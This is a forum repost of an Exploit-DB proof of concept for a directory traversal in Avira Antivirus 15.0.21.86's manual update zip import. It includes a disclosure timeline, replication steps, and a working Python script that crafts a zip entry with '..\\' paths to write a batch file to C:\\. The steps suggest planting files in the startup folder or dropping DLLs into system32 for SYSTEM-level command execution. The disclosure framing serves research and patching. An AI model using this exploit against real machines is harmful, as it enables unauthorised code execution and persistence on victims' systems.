Jump to content
Nytro

Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution

  

# Title :  Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)
# Date : 08/11/2016
# Author : R-73eN
# Tested on: Avira Antivirus 15.0.21.86 in Windows 7
# Vendor : https://www.avira.com/
# Disclosure Timeline:
# 2016-06-28 - Reported to Vendor through Bugcrowd.
# 2016-06-29 - Vendor Replied.
# 2016-07-05 - Vendor Replicated the vulnerability.
# 2016-09-02 - Vendor released updated version which fix the vulnerability.
# 2016-11-08 - Public Disclosure
# I would like to thank Avira security team for the quick response. 
#
# Vulnerability Description:
# When the Avira Launcher manual update imports a zip file doesn't checks for " ../ " 
# characters which makes it possible to do a path traversal and write anywhere in the system.
# Vulnerability Replication
# 1. Create a special crafted zip file with the python script attached. 
# 2. The script will create a zip file named xvdf_fusebundle.zip with a filename test.bat (this can be changed) and will write this file to the root directory C:\ 
# 3. You can change the directory go to startup and when the user reboots the script will get executed or you can write a malicious dll to a program directory or 
#    system32 directory which will get loaded and we gain remote command execution. 
# 4. Open avira free antivirus 
# 5. Go to update -> Manual Update 
# 6. Select the malicious file 
# 7. Directory traversal was sucessfull
# Youtube Video: https://www.youtube.com/watch?v=IIEgWiDcw2Q
# POC: 
 
#!/usr/bin/python -w
banner = ""
banner += "  ___        __        ____                 _    _  \n"
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner
 
import zipfile, sys
 
 
if(len(sys.argv) != 2):
    print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
    print "[+] Example: python exploit.py test.txt"
    exit(0)
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile("xvdf_fusebundle.zip", "w")
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\test.bat")
zf.close()
print "[+] Created xvdf_fusebundle.zip successfully [+]"
 
# Fix:
# Update to the latest version.

Sursa: https://www.exploit-db.com/exploits/40741/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...